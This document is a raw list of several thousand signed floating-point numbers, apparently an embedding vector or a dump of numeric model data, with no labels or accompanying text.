0.007752268109470606, -0.003569734748452902, -0.008350299671292305, -0.007490167394280434, 0.011783447116613388, -0.007165310438722372, -0.0058105094358325005, 0.00800329353660345, 0.012041856534779072, -0.0070250313729047775, 0.026815464720129967, -0.012839232571423054, 0.013378199189901352, 0.00004565416747936979, 0.0024456558749079704, -0.014980334788560867, 0.001844855141825974, -0.02625434845685959, 0.01955048181116581, -0.015135380439460278, 0.008187871426343918, -0.012411012314260006, -0.0014240178279578686, 0.018620209768414497, -0.01078672707080841, -0.010269909165799618, -0.006353168282657862, 0.020480753853917122, -0.009775240905582905, 0.013621842488646507, -0.01424940675497055, -0.0016372051322832704, 0.01286876481026411, 0.020569350570440292, 0.007002882193773985, 0.009775240905582905, 0.007781800348311663, 0.010144396685063839, -0.0009404239244759083, 0.001684272545389831, -0.009354403242468834, 0.011709616519510746, 0.0007069330313242972, -0.003069529077038169, 0.01534210704267025, 0.026638269424438477, 0.016198549419641495, 0.008497962728142738, 0.00009101993055082858, 0.0043818773701786995, 0.011126350611448288, -0.010100097395479679, 0.019033662974834442, -0.021809713914990425, -0.013998380862176418, 0.007501242216676474, 0.026771165430545807, -0.01512061432003975, 0.015283042564988136, 0.0029975436627864838, -0.0005218937294557691, 0.014352770522236824, 0.004208373837172985, -0.0015965980710461736, 0.009103377349674702, 0.007320356089621782, -0.014884354546666145, -0.007951611652970314, 0.010683363303542137, 0.008963098749518394, -0.0016039811307564378, -0.004994675517082214, 0.0035014410968869925, 0.0031599721405655146, -0.00828385166823864, 0.01054308470338583, -0.01054308470338583, -0.0015532223042100668, 0.006973349489271641, -0.0022979937493801117, -0.009376552887260914, -0.010506168939173222, 0.00636793440207839, -0.00938393548130989, 0.024142777547240257, -0.005264159291982651, -0.0007313895621336997, 0.0017885590204969049, 0.03269242122769356, -0.0293700210750103, -0.0006243344396352768, -0.004012721590697765, -0.0013511095894500613, -0.009701409377157688, -0.0009736479260027409, -0.022474193945527077, -0.016124717891216278, 0.010683363303542137, -0.023906517773866653, -0.023906517773866653, -0.013385582715272903, 0.015563600696623325, -0.010506168939173222, 0.005286308471113443, 0.018295353278517723, -0.0012495918199419975, -0.01634621061384678, 0.011451207101345062, 0.0034552966244518757, -0.0016399738378822803, 0.017985261976718903, -0.0009422696894034743, -0.005611165426671505, 0.001439706888049841, -0.0017387229017913342, 0.025767061859369278, 0.0038281437009572983, -0.019077962264418602, 0.011126350611448288, 0.00150707783177495, 0.00027594383573159575, 0.009125526994466782, -0.004570146556943655, -0.0021706349216401577, -0.004237906541675329, -0.016995925456285477, 0.008350299671292305, 0.006068918388336897, 0.007936845533549786, 0.003243032144382596, -0.027819566428661346, -0.004858087748289108, -0.011155882850289345, 0.00042429822497069836, 0.011502888984978199, -0.02008206583559513, -0.016021354123950005, -0.011207564733922482, 0.002314605750143528, -0.0029717027209699154, -0.011347843334078789, -0.01788189820945263, -0.018605442717671394, -0.009088611230254173, -0.005086964461952448, -0.006991807371377945, -0.008940949104726315, 0.022016441449522972, 0.002449347637593746, 0.010993454605340958, -0.028026293963193893, -0.006493447348475456, -0.006120600271970034, 0.014744075015187263, 0.020923741161823273, 0.004038562532514334, -0.023965582251548767, 0.01231503114104271, 0.006035694386810064, -0.023611193522810936, 0.003121210727840662, 0.006844145245850086, 0.010904856957495213, 0.03514361381530762, 0.01718788594007492, 0.016951626166701317, -0.02467436157166958, -0.032544758170843124, 0.0033759281504899263, 0.016715366393327713, -0.0057034543715417385, 0.000928426394239068, 0.014463516883552074, 0.00520509434863925, 0.01411651074886322, -0.002183555392548442, -0.0005948019679635763, 0.005991395562887192, -0.009317487478256226, 0.01854637823998928, 0.009716175496578217, 0.008800669573247433, 0.004119776654988527, 0.025013985112309456, -0.009775240905582905, 0.02700742520391941, 0.005832658614963293, 0.0000838098640087992, 0.013392966240644455, -0.013518478721380234, 0.023921284824609756, 0.010004117153584957, -0.0019214550266042352, 0.0019196092616766691, -0.005452428478747606, -0.02195737697184086, 0.009059078991413116, 0.0019528332632035017, 0.01915179379284382, 0.01661200262606144, -0.005138646345585585, -0.003979497589170933, -0.021662050858139992, -0.017527509480714798, -0.015637431293725967, -0.029443852603435516, 0.0016870411345735192, 0.008948332630097866, 0.016198549419641495, 0.0013658758252859116, 0.002200167393311858, 0.02257755771279335, 0.012211667373776436, 0.029296189546585083, -0.010041032917797565, -0.002718831179663539, 0.007124703377485275, -0.0005551177309826016, 0.01854637823998928, 0.006360551342368126, -0.0027926622424274683, -0.0005398900830186903, -0.0012855844106525183, -0.012064005248248577, 0.0002826347772497684, -0.00841674767434597, -0.01656770333647728, -0.0168777946382761, -0.003927815705537796, -0.0004042254004161805, 0.02055458538234234, 2.1630212287959694e-8, -0.015755562111735344, 0.0008910493925213814, 0.007128395140171051, 0.0015098464209586382, 0.002013743855059147, -0.015460236929357052, -0.0015762945404276252, -0.005917564500123262, 0.020805610343813896, 0.007936845533549786, 0.0016252076020464301, -0.031156733632087708, -0.0032485693227499723, 0.015327340923249722, 0.021248597651720047, 0.006116908509284258, 0.006408541463315487, -0.022016441449522972, -0.014433984644711018, 0.0273913461714983, 0.010690746828913689, 0.014035296626389027, -0.01010748092085123, -0.008970481343567371, 0.0014027913566678762, -0.0003710013988893479, 0.01455211453139782, 0.002083883387967944, -0.014913886785507202, 0.007885163649916649, 0.00900739710777998, 0.015401172451674938, -0.017468443140387535, -0.009206741116940975, 0.012506992556154728, -0.0016584316035732627, -0.016818730160593987, 0.024925386533141136, 0.00868253968656063, -0.034257642924785614, 0.0005666538490913808, 0.00636793440207839, -0.00006414078961824998, -0.012263349257409573, -0.0012828158214688301, 0.011185415089130402, 0.021263362839818, 0.02117476612329483, 0.030004968866705894, 0.01328221894800663, -0.000026648420316632837, -0.0008352145669050515, -0.004470474552363157, -0.03951441869139671, 0.0036841731052845716, -0.020805610343813896, 0.0341985747218132, 0.0007858400349505246, -0.004463091492652893, -0.004463091492652893, -0.011812979355454445, -0.011687466874718666, -0.004695659503340721, 0.0015476848930120468, -0.021558688953518867, 0.020702246576547623, -0.004511081613600254, 0.009797390550374985, 0.011798213236033916, -0.021676817908883095, -0.0006017236737534404, -0.0030787577852606773, 0.0006238729692995548, -0.0030215387232601643, 0.0026837612967938185, 0.0039462735876441, 0.02025926113128662, 0.015268276445567608, -0.0015393788926303387, 0.004057020414620638, 0.03913049399852753, 0.008534877561032772, 0.012211667373776436, -0.007028723135590553, -0.027760501950979233, -0.011251863092184067, -0.019255157560110092, -0.0007895315648056567, 0.012861381284892559, -0.0062867202796041965, 0.025575101375579834, -0.005965554621070623, 0.023640725761651993, -0.000581881555262953, -0.009804773144423962, 0.023950817063450813, 0.017734235152602196, -0.0009459612774662673, 0.010624298825860023, 0.02621004916727543, 0.0170992873609066, -0.009243656881153584, 0.009649727493524551, 0.017601339146494865, 0.016080418601632118, -0.020318325608968735, 0.014035296626389027, 0.006969658192247152, 0.008254319429397583, -0.006678025238215923, 0.0007461557979695499, -0.019831039011478424, 0.01876787096261978, 0.014655478298664093, -0.0017018073704093695, -0.0024382728151977062, 0.011606252752244473, -0.007671053521335125, -0.0009598046308383346, 0.0027391347102820873, -0.0053158407099545, 0.010137013159692287, -0.0085496436804533, 0.028646476566791534, 0.003650949103757739, -0.0011729919351637363, -0.014123894274234772, 0.020628415048122406, -0.014101744629442692, 0.016641534864902496, 0.006257187575101852, -0.012278116308152676, -0.017867131158709526, 0.003748775226995349, 0.0006054152036085725, 0.015371640212833881, -0.018251053988933563, 0.008564410731196404, 0.021765414625406265, -0.014744075015187263, -0.000753077445551753, -0.006205506157130003, -0.004271130543202162, -0.020141130313277245, 0.000636793440207839, -0.0003899206349160522, -0.02358166128396988, 0.003296559676527977, 0.00804759282618761, -0.014854822307825089, 0.004038562532514334, 0.012831849046051502, -0.013658758252859116, -0.011369992978870869, -0.0025194871705025434, 0.013134556822478771, -0.010668597184121609, 0.017689937725663185, 0.031363461166620255, 0.001618747366592288, 0.003174738259986043, 0.0018411636119708419, 0.014995100907981396, -0.0031045987270772457, 0.004093935713171959, -0.02494015358388424, 0.005537334363907576, -0.00008629012882011011, -0.0005380443180911243, -0.004655052442103624, 0.03328306972980499, 0.0027354431804269552, -0.00015400710981339216, -0.01080887671560049, -0.00483224680647254, 0.0016999616054818034, 0.040843378752470016, 0.018561145290732384, 0.020820377394557, -0.004529539495706558, 0.007135778199881315, 0.01761610619723797, 0.0015190753620117903, -0.008136189542710781, -0.007549232337623835, -0.008187871426343918, -0.0053638312965631485, -0.022296998649835587, 0.005190327763557434, -0.007534466218203306, -0.0011139271082356572, -0.0014064828865230083, -0.011133733205497265, -0.00033939245622605085, -0.025043517351150513, -0.004193607717752457, 0.013215770944952965, 0.006068918388336897, -0.02367025800049305, -0.011709616519510746, 0.0075307744555175304, -0.007301898207515478, -0.007390495389699936, 0.014618562534451485, 0.01894506625831127, 0.0016916556051000953, -0.013843335211277008, 0.03529127687215805, -0.0001845778024289757, 0.02919282577931881, 0.010882707312703133, 0.021839246153831482, -0.010122247040271759, -0.011237096972763538, -0.020023001357913017, 0.02910422906279564, 0.0021281822118908167, -0.008446280844509602, -0.021942609921097755, 0.0020820377394557, 0.02186877839267254, 0.00014893121260683984, 0.008638241328299046, -0.021145233884453773, 0.007899929769337177, -0.0054487367160618305, 0.005382288713008165, 0.014884354546666145, 0.01727648265659809, -0.008756371214985847, 0.0315701887011528, 0.01317147258669138, -0.03399185091257095, -0.016951626166701317, -0.0333126038312912, 0.0210418701171875, 0.001102852402254939, -0.0007632292108610272, -0.0147957568988204, 0.021676817908883095, -0.001615055836737156, 0.013474180363118649, 0.0110672852024436, 0.002650537295266986, -0.0031027530785650015, -0.017173118889331818, -0.0006450994405895472, 0.008955715224146843, -0.00414192583411932, 0.013584926724433899, -0.01670059934258461, 0.011716999113559723, -0.01841348223388195, -0.022872881963849068, -0.029074696823954582, 0.01286876481026411, 0.007239141501486301, -0.018265819177031517, -0.00021872470097150654, 0.010026266798377037, 0.004112393595278263, -0.005094347521662712, -0.003543894039466977, 0.018118157982826233, 0.024585764855146408, 0.000575421319808811, 0.004684584680944681, 0.011229713447391987, 0.003942581824958324, -0.003636182751506567, 0.010373272933065891, -0.019712910056114197, 0.010594766587018967, -0.0017636410193517804, 0.02340446598827839, 0.008401981554925442, -0.008054975420236588, -0.021854013204574585, 0.0002847112773451954, 0.021322429180145264, 0.012381479144096375, -0.006607885472476482, 0.0059950873255729675, -0.007781800348311663, 0.0018162456108257174, 0.010705512948334217, -0.0006575584411621094, 0.0036638695746660233, 0.02578182891011238, -0.03019692935049534, 0.017955729737877846, 0.037240419536828995, -0.0027668213006109, 0.002718831179663539, 0.025796594098210335, 0.009915519505739212, 0.010513551533222198, -0.010506168939173222, -0.022739985957741737, -0.011296161450445652, -0.003185813082382083, 0.0015449163038283587, -0.020495519042015076, -0.016951626166701317, 0.007641521282494068, 0.013799036853015423, -0.03694509342312813, -0.017940962687134743, 0.013658758252859116, 0.027937697246670723, 0.024881089106202126, -0.005227243527770042, 0.017867131158709526, 0.004130851477384567, 0.008032825775444508, -0.026549672707915306, -0.013001660816371441, -0.0052161687053740025, -0.014050062745809555, 0.02253325842320919, 0.006892135366797447, 0.0014812368899583817, -0.004581221379339695, 0.010284675285220146, -0.02722891792654991, -0.000807527918368578, 0.0037266260478645563, 0.0011250016978010535, -0.002268461277708411, 0.007290823385119438, 0.020849909633398056, -0.005146029405295849, -0.014212490990757942, 0.0032725646160542965, 0.003650949103757739, 0.005902798380702734, -0.009893370792269707, -0.0050721983425319195, 0.014537348411977291, -0.013917166739702225, -0.03871704265475273, -0.02095327340066433, 0.00727605726569891, 0.000749847327824682, 0.007061947137117386, -0.01981627382338047, -0.0016981158405542374, 0.002004514914005995, -0.0003338551032356918, 0.012913063168525696, 0.009413468651473522, 0.026328178122639656, 0.002884951187297702, 0.019875338301062584, 0.022326530888676643, -0.010336357168853283, -0.01678919792175293, -0.0020118982065469027, -0.009088611230254173, -0.012543908320367336, -0.0166563019156456, -0.020569350570440292, 0.004931919276714325, -0.022636622190475464, -0.014980334788560867, 0.00601723650470376, -0.0019251465564593673, 0.01625761389732361, -0.0034497592132538557, -0.016080418601632118, 0.013525862246751785, -0.002022972796112299, 0.010882707312703133, -0.0007613834459334612, 0.0016482798382639885, -0.002022972796112299, -0.022474193945527077, 0.01093438919633627, 0.001851315377280116, 0.012108304537832737, 0.01569649763405323, 0.0064528402872383595, -0.03292868286371231, 0.005744061432778835, -0.02643154188990593, -0.005577941425144672, 0.008136189542710781, -0.0004093012830708176, -0.004928227514028549, -0.016641534864902496, 0.001567988540045917, 0.010742428712546825, 0.010904856957495213, -0.0064306906424462795, 0.014352770522236824, 0.009568513371050358, -0.0036712526343762875, 0.015179678797721863, 0.030566085129976273, -0.005888032261282206, 0.03086140938103199, 0.01135522685945034, 0.012521758675575256, 0.008114040829241276, 0.009361786767840385, 0.007383112329989672, -0.003363007679581642, -0.003916740883141756, -0.02805582620203495, 0.009059078991413116, 0.01036588940769434, -0.015327340923249722, -0.0007664593285880983, 0.005976629443466663, -0.0157850943505764, -0.002499183639883995, 0.0021041869185864925, 0.006951200310140848, 0.02507304958999157, 0.018841702491044998, 0.00037284716381691396, 0.014648094773292542, 0.00044898552005179226, 0.027730969712138176, 0.0024475017562508583, 0.006264570634812117, -0.001503386301919818, 0.0014673935947939754, 0.0012099075829610229, -0.00636793440207839, 0.017217418178915977, 0.003006772603839636, -0.001675043604336679, 0.00925103947520256, -0.026859762147068977, -0.014544731006026268, -0.020155897364020348, 0.0038392185233533382, 0.023197738453745842, 0.00815095566213131, -0.00291079212911427, 0.006471298169344664, -0.012388862669467926, -0.004333886783570051, 0.003292868146672845, -0.05256776139140129, -0.00015931372763589025, -0.027287982404232025, -0.0063347104005515575, 0.02389175072312355, -0.0007406184449791908, 0.000807989330496639, -0.020569350570440292, -0.003924124408513308, -0.017350314185023308, -0.0005971092032268643, -0.011037752963602543, 0.0018143998458981514, -0.012411012314260006, -0.023079609498381615, 0.002375516341999173, -0.03260382264852524, 0.006338402163237333, -0.009125526994466782, 0.002995697781443596, 0.027243684977293015, -0.023611193522810936, -0.006449148524552584, 0.03346026688814163, -0.01941758580505848, 0.0394553542137146, -0.014212490990757942, -0.005374905653297901, -0.009287955239415169, 0.01371782273054123, -0.015061548911035061, 0.002187246922403574, -0.015445470809936523, -0.018561145290732384, -0.009339637123048306, -0.0044187926687300205, -0.025235477834939957, -0.02113046683371067, 0.013732588849961758, -0.009206741116940975, -0.000015126728612813167, -0.0032264201436191797, -0.003953656647354364, -0.02945861779153347, 0.00762675516307354, -0.0030436881352216005, 0.01639050990343094, 0.0038909001741558313, -0.0057514444924890995, -0.004356036428362131, 0.004618136677891016, -0.002358904341235757, -0.004082861356437206, 0.015164912678301334, -0.023729322478175163, -0.00207096291705966, -0.015445470809936523, -0.004714117385447025, -0.005445045419037342, -0.003135977080091834, 0.00371001404710114, -0.007449560333043337, 0.005577941425144672, 0.008970481343567371, 0.005493035539984703, -0.008232170715928078, -0.01859067752957344, 0.011421674862504005, -0.004433558788150549, 0.025176413357257843, -0.006046769209206104, -0.015179678797721863, 0.0010465561645105481, -0.00841674767434597, 0.010144396685063839, -0.017158353701233864, 0.004765798803418875, 0.00013993305037729442, -0.00346821709536016, 0.011561954393982887, -0.025058282539248466, -0.0029698568396270275, 0.01805909350514412, -0.013680906966328621, 0.0014129431219771504, -0.003636182751506567, 0.013407732360064983, 0.01560789905488491, 0.00802544318139553, 0.00150154042057693, 0.005404438357800245, -0.022872881963849068, -0.028735073283314705, -0.0017737927846610546, 0.012617738917469978, -0.01603611931204796, 0.009110760875046253, -0.03490735590457916, -0.009014780633151531, 0.006622651591897011, 0.022562790662050247, 0.002545327879488468, 0.009073845110833645, 0.007767034228891134, 0.008881883695721626, 0.0010687054600566626, -0.01512061432003975, 0.003645411692559719, 0.016124717891216278, 0.0197276771068573, -0.0014747766545042396, 0.00801805965602398, -0.017985261976718903, 0.011908960528671741, 0.014640712179243565, -0.005164487287402153, 0.009546364657580853, -0.008697306737303734, -0.028897501528263092, 0.0054598115384578705, 0.003990572411566973, 0.017424145713448524, 0.01678919792175293, -0.003990572411566973, -0.02709602192044258, 0.006582044530659914, 0.015268276445567608, 0.0012099075829610229, 0.024541465565562248, -0.01027729269117117, 0.0009187360410578549, 0.01538640633225441, 0.002250003395602107, -0.00024364270211663097, -0.004204682540148497, -0.022282233461737633, -0.009221507236361504, 0.009716175496578217, -0.009694026783108711, 0.014537348411977291, -0.021100934594869614, 0.003745083697140217, 0.00486547127366066, 0.03001973405480385, -0.0025803977623581886, -0.013880250975489616, -0.018708806484937668, -0.0013243458233773708, 0.021381493657827377, -0.008867117576301098, -0.0036121876910328865, -0.008822819218039513, 0.0039019747637212276, 0.001793173374608159, 0.01736507937312126, 0.01111158449202776, 0.009989351034164429, 0.0004914384335279465, -0.026712100952863693, -0.009081228636205196, 0.009036929346621037, 0.0027871248312294483, 0.027302749454975128, 0.01133307721465826, -0.010041032917797565, -0.0016049040714278817, 0.01038803905248642, -0.004684584680944681, -0.012662037275731564, 0.002305376809090376, -0.00232383469119668, 0.001450781594030559, -0.006297794636338949, 0.005969246383756399, 0.007456943392753601, 0.01950618252158165, 0.010122247040271759, -0.031068136915564537, 0.01779330149292946, -0.005149720702320337, 0.019934402778744698, 0.002475188346579671, 0.018295353278517723, -0.005105422344058752, -0.0018891538493335247, 0.016464341431856155, -0.021278129890561104, -0.014286322519183159, 0.026756398379802704, 0.0254274383187294, -0.016995925456285477, 0.001739645842462778, -0.00519401952624321, 0.010070565156638622, -0.017379846423864365, 0.0033722366206347942, 0.01723218336701393, -0.007877781055867672, -0.019092729315161705, -0.023950817063450813, -0.0013769504148513079, 0.01932898722589016, -0.011096817441284657, 0.003189504612237215, -0.011864661239087582, 0.005581632722169161, -0.003171046730130911, 0.002901563188061118, 0.014655478298664093, -0.0053158407099545, 0.010122247040271759, 0.006153824273496866, 0.013105024583637714, 0.010269909165799618, 0.012019706889986992, -0.021056637167930603, -0.008653007447719574, 0.011318311095237732, 0.018649742007255554, 0.011716999113559723, 0.009258423000574112, -0.021278129890561104, -0.03007880039513111, -0.0120566226541996, -0.0060541522689163685, 0.03001973405480385, -0.0033703907392919064, 0.0006271030870266259, -0.00004501968214754015, 0.005961863324046135, -0.014456134289503098, -0.012817082926630974, 0.01052093505859375, 0.005880649201571941, -0.002019281266257167, 0.0016464340733364224, -0.006774005480110645, 0.015046782791614532, 0.030137864872813225, -0.021676817908883095, 0.04391475394368172, 0.012307648546993732, -0.015593132935464382, 0.028941800817847252, -0.011096817441284657, 0.011576720513403416, 0.012159986421465874, -0.032160837203264236, 0.009479916654527187, 0.004108701832592487, -0.0010179466335102916, 0.03183598071336746, 0.008800669573247433, -0.01678919792175293, 0.014278938993811607, 0.0033427041489630938, 0.012292882427573204, -0.010424954816699028, 0.00929533876478672, 0.0009939514566212893, 0.008793286979198456, 0.004064403474330902, -0.03862844407558441, 0.027361813932657242, -0.00659681111574173, 0.015799859538674355, 0.006703866180032492, -0.0199491698294878, 0.03735854849219322, 0.013865484856069088, -0.0014517044182866812, -0.007730118464678526, -0.004001646768301725, -0.0284988135099411, 0.00804759282618761, 0.006323635578155518, -0.003315017558634281, 0.00942823477089405, 0.006227655336260796, 0.004134542774409056, 0.009184591472148895, 0.014160809107124805, -0.030625149607658386, 0.01937328651547432, -0.02792293019592762, -0.0040791695937514305, -0.010439720936119556, -0.006157515570521355, 0.0015292271273210645, -0.003632491221651435, -0.01010748092085123, -0.013311751186847687, -0.014995100907981396, 0.012477460317313671, -0.018354417756199837, 0.0029753942508250475, -0.007261291146278381, -0.0007563075632788241, 0.007235450204461813, 0.006449148524552584, -0.012425778433680534, 0.02073177881538868, -0.01124448049813509, 0.005160795524716377, -0.004470474552363157, -0.00013151168241165578, 0.018177222460508347, -0.03251522779464722, -0.009443000890314579, -0.00939870160073042, 0.001910380320623517, -0.025663698092103004, -0.010565233416855335, 0.011731765232980251, 0.012780167162418365, -0.03310587629675865, 0.0013640300603583455, 0.018177222460508347, -0.004680893383920193, -0.014987718313932419, -0.0023533671628683805, -0.009036929346621037, 0.00871945545077324, -0.009620195254683495, -0.010919623076915741, -0.01805909350514412, 0.0009325793944299221, 0.020584117621183395, 0.03493688628077507, 0.02095327340066433, -0.010151779279112816, 0.029384786263108253, 0.014899120666086674, -0.00914029311388731, -0.012536524794995785, -0.017675170674920082, 0.0017276483122259378, -0.010867941193282604, -0.016626769676804543, 0.011443824507296085, -0.002907100599259138, 0.010432337410748005, 0.01946188509464264, 0.004703042563050985, -0.015858925879001617, 0.01286876481026411, 0.009981967508792877, -0.019166558980941772, -0.029133761301636696, 0.01161363534629345, 0.012566057033836842, 0.005504110362380743, 0.006648492533713579, 0.006039385683834553, -0.0060430774465203285, 0.009354403242468834, -0.011436440981924534, 0.0008121423306874931, 0.002945861779153347, 0.021100934594869614, -0.00519401952624321, 0.0064528402872383595, -0.007460635155439377, -0.021676817908883095, -0.011842512525618076, -0.023640725761651993, -0.007575073279440403, 0.00755292410030961, -0.0015356873627752066, -0.003745083697140217, 0.0025231787003576756, -0.026018088683485985, 0.03449390083551407, 0.013533244840800762, 0.018620209768414497, -0.0036583321634680033, -0.023256804794073105, -0.0030289217829704285, 0.009443000890314579, 0.0028498813044279814, -0.01520921103656292, 0.003569734748452902, -0.012647271156311035, -0.001848546788096428, 0.00637900922447443, 0.0014166346518322825, 0.013134556822478771, -0.008453663438558578, 0.004942993633449078, -0.016493873670697212, -0.025619400665163994, 0.006604194175451994, 0.028912268579006195, 0.015223978087306023, -0.0016907327808439732, 0.016730133444070816, 0.03703369200229645, -0.008394598960876465, 0.0017414916073903441, -0.006157515570521355, 0.016420042142271996, -0.01218951866030693, 0.0006455609109252691, -0.006829379126429558, -0.008217403665184975, -0.000809835153631866, 0.0077744172886013985, -0.012300265021622181, -0.008468429557979107, 0.0007987604476511478, 0.008054975420236588, -0.006194431334733963, 0.0024567306973040104, 0.010269909165799618, -0.016420042142271996, 0.0031452057883143425, 0.008077125065028667, 0.013710439205169678, 0.0157850943505764, 0.006283028516918421, -0.012100921012461185, -0.005031591281294823, 0.004459399729967117, 0.03230850026011467, -0.024526698514819145, 0.013710439205169678, 0.004071786534041166, 0.010395422577857971, 0.003623262280598283, 0.004913461394608021, -0.008697306737303734, 0.01111158449202776, 0.01792619749903679, 0.001976828323677182, -0.004171458538621664, 0.00973094254732132, 0.00057818996720016, -0.0009182745707221329, -0.010823642835021019, -0.019048430025577545, 0.019712910056114197, -0.014470900408923626, 0.0025656316429376602, 0.005478269420564175, 0.014566880650818348, -0.011849895119667053, -0.0060283113270998, -0.006271954160183668, -0.003865059232339263, 0.0341985747218132, 0.004544305615127087, 0.005083272699266672, 0.024408569559454918, 0.019402818754315376, -0.005031591281294823, -0.009022163227200508, 0.016360977664589882, 0.014566880650818348, 0.006751856300979853, 0.004950376693159342, -0.011694850400090218, -0.011554570868611336, 0.0055336426012218, 0.022474193945527077, 0.02095327340066433, 0.007988527417182922, 0.018841702491044998, -0.01732078194618225, 0.006463914643973112, 0.01093438919633627, 0.022415129467844963, 0.013776887208223343, -0.013621842488646507, 0.02275475300848484, 0.014123894274234772, 0.006751856300979853, 0.0007443100330419838, -0.007922079414129257, 0.008062358945608139, 0.031009072437882423, 0.0004127621359657496, 0.023552129045128822, -0.00016300527204293758, -0.0035051326267421246, 0.0072686742059886456, 0.02349306270480156, -0.010690746828913689, -0.029473384842276573, 0.005603782366961241, 0.027376580983400345, 0.007294515147805214, 0.014234640635550022, 0.006486064288765192, -0.0190631952136755, 0.004348653368651867, 0.0002287611278006807, 0.012093538418412209, 0.023685025051236153, 0.022503726184368134, -0.0033260921481996775, -0.006818304304033518, 0.008210021071135998, 0.012086154893040657, 0.002541636349633336, -0.02235606499016285, -0.011163265444338322, -0.0051681785844266415, 0.007309281267225742, 0.03791966661810875, 0.00015389174222946167, 0.003425764152780175, -0.006991807371377945, 0.005980321206152439, 0.010336357168853283, -0.029163293540477753, 0.020362623035907745, -0.00029117148369550705, 0.007523391395807266, -0.018383949995040894, 0.008424131199717522, -0.004075477831065655, 0.0013714131200686097, -0.0166563019156456, 0.007043489255011082, 0.027760501950979233, 0.0157850943505764, -0.0016510485438629985, -0.0040311794728040695, 0.02086467482149601, -0.022725218906998634, 0.011178032495081425, 0.017512742429971695, 0.0051312632858753204, -0.005485652480274439, -0.008069741539657116, -0.01723218336701393, -0.017202651128172874, 0.009509448893368244, 0.0031193650793284178, 0.021514389663934708, -0.007929462939500809, -0.022326530888676643, -0.010919623076915741, -0.005537334363907576, 0.004968834575265646, 0.003237494733184576, -0.011650551110506058, 0.009612812660634518, -0.020023001357913017, 0.00048774684546515346, -0.006290411576628685, -0.004400334786623716, 0.003241186263039708, -0.005057431757450104, 0.012506992556154728, 0.000346544838976115, -0.014086978510022163, 0.024275673553347588, -0.007508625276386738, 0.006762931123375893, -0.009753091260790825, -0.01359231024980545, 0.015194444917142391, -0.0021724808029830456, -0.015032016672194004, 0.013156706467270851, 0.030920473858714104, -0.006072609685361385, 0.011163265444338322, -0.0036694067530333996, 0.007456943392753601, 0.03159971907734871, 0.0029052547179162502, -0.014389686286449432, -0.011886810883879662, 0.016154250130057335, 0.005891723558306694, 0.0197276771068573, 0.0029292497783899307, -0.004105010535567999, -0.005950788501650095, 0.00801805965602398, 0.011096817441284657, -0.012935212813317776, 0.0016916556051000953, -0.0004918998456560075, -0.012041856534779072, 0.012064005248248577, 0.014360153116285801, -0.029960669577121735, -0.006308869458734989, 0.01439706888049841, 0.01345941424369812, -0.014146042987704277, -0.021278129890561104, 0.0003121672198176384, 0.007324047386646271, 0.0029772401321679354, -0.01052093505859375, -0.013105024583637714, -0.038687508553266525, -0.017778534442186356, 0.022326530888676643, -0.021056637167930603, -0.01398361474275589, -0.0019306838512420654, 0.016582470387220383, -0.010727662593126297, 0.0034645255655050278, 0.01587369106709957, 0.016331445425748825, 0.01440445240586996, -0.00013301138824317604, 0.007128395140171051, -0.0021503313910216093, 0.004666126798838377, 0.02095327340066433, -0.0038576761726289988, 0.006271954160183668, -0.010469253174960613, -0.0051201884634792805, -0.007671053521335125, -0.01036588940769434, -0.002309068338945508, 0.012831849046051502, -0.05684996396303177, 0.02173588238656521, 0.011045136488974094, 0.02371455729007721, 0.029975436627864838, 0.01986057311296463, 0.015135380439460278, 0.00042845122516155243, -0.01284661516547203, -0.0014756995951756835, 0.00727605726569891, -0.01495080254971981, -0.011495506390929222, 0.0031433601398020983, -0.0015172295970842242, -0.000230952980928123, 0.0006054152036085725, 0.050913941115140915, -0.010565233416855335, 0.00755292410030961, 0.010055799037218094, -0.007412645034492016, 0.005426587536931038, 0.0032707187347114086, -0.01332651823759079, -0.019919637590646744, 0.002774204360321164, -0.008032825775444508, -0.009620195254683495, 0.025087816640734673, 0.004156692419201136, -0.024083713069558144, 0.0076784370467066765, 0.0037173971068114042, -0.006371626164764166, -0.007863014936447144, -0.028173957020044327, 0.005828967317938805, -0.0017433373723179102, 0.014027913101017475, 0.01286876481026411, 0.021233830600976944, 0.006655875593423843, -0.010867941193282604, 0.016287146136164665, 0.007833481766283512, -0.042083740234375, 0.012780167162418365, -0.005633314605802298, 0.007663670461624861, 0.0030972156673669815, 0.015534068457782269, 0.015179678797721863, 0.006146441213786602, 0.009369169361889362, -0.004348653368651867, -0.020879441872239113, 0.011495506390929222, 0.010402805171906948, -0.0027668213006109, -0.007113628555089235, 0.0009948743972927332, 0.008741605095565319, -0.0058105094358325005, 0.0011453053448349237, 0.005430279299616814, -0.005965554621070623, 0.005223551765084267, 0.014847438782453537, 0.0041382345370948315, -0.004588604439049959, 0.005522568244487047, -0.024009881541132927, 0.0009874912211671472, -0.006301486399024725, -0.015755562111735344, 0.0034239182714372873, 0.007150544319301844, -0.0025545568205416203, -0.0002591010998003185, 0.02021496184170246, -0.020717013627290726, 0.008608709089457989, 0.01732078194618225, 0.015711262822151184, -0.012676804326474667, 0.012543908320367336, -0.01587369106709957, -0.00637900922447443, 0.003876134054735303, -0.010033649392426014, -0.022326530888676643, -0.007781800348311663, 0.0170992873609066, -0.020628415048122406, 0.002030355855822563, -0.00027294442406855524, -0.0042342147789895535, -0.0063457852229475975, 0.011517655104398727, -0.005991395562887192, -0.003346395678818226, 0.0024604222271591425, -0.015888458117842674, -0.016863029450178146, -0.01941758580505848, 0.02090897411108017, 0.015164912678301334, 0.011953258886933327, -0.006319944281131029, -0.009538981132209301, 0.007700586225837469, 0.012196901254355907, 0.0009450383950024843, 0.007032414432615042, 0.0017996336100623012, 0.018000027164816856, 0.007840865291655064, 0.015888458117842674, -0.008475813083350658, 0.004237906541675329, -0.001394485356286168, -0.028882736340165138, -0.013821186497807503, -0.02051028609275818, -0.02810012549161911, -0.005064815282821655, 0.007907313294708729, 0.00942823477089405, -0.010580000467598438, -0.0015929065411910415, 0.005382288713008165, -0.0028055827133357525, -0.02367025800049305, -0.00970879290252924, 0.013215770944952965, -0.005832658614963293, 0.0051312632858753204, 0.017512742429971695, 0.03159971907734871, -0.003246723674237728, 0.015947522595524788, -0.022828582674264908, 0.011569336988031864, 0.012019706889986992, 0.00231829727999866, -0.0011157728731632233, -0.0006884752074256539, -0.00914029311388731, -0.020628415048122406, 0.006519288290292025, 0.001450781594030559, 0.01510584820061922, 0.008468429557979107, -0.007648904342204332, 0.005341681651771069, -0.0008186025661416352, -0.02025926113128662, 0.020702246576547623, -0.006297794636338949, 0.012780167162418365, -0.023005777969956398, 0.014766224659979343, -0.0147957568988204, -0.006810921244323254, -0.006700174417346716, -0.023478297516703606, 0.018620209768414497, 0.004241597838699818, 0.027583308517932892, 0.009967201389372349, 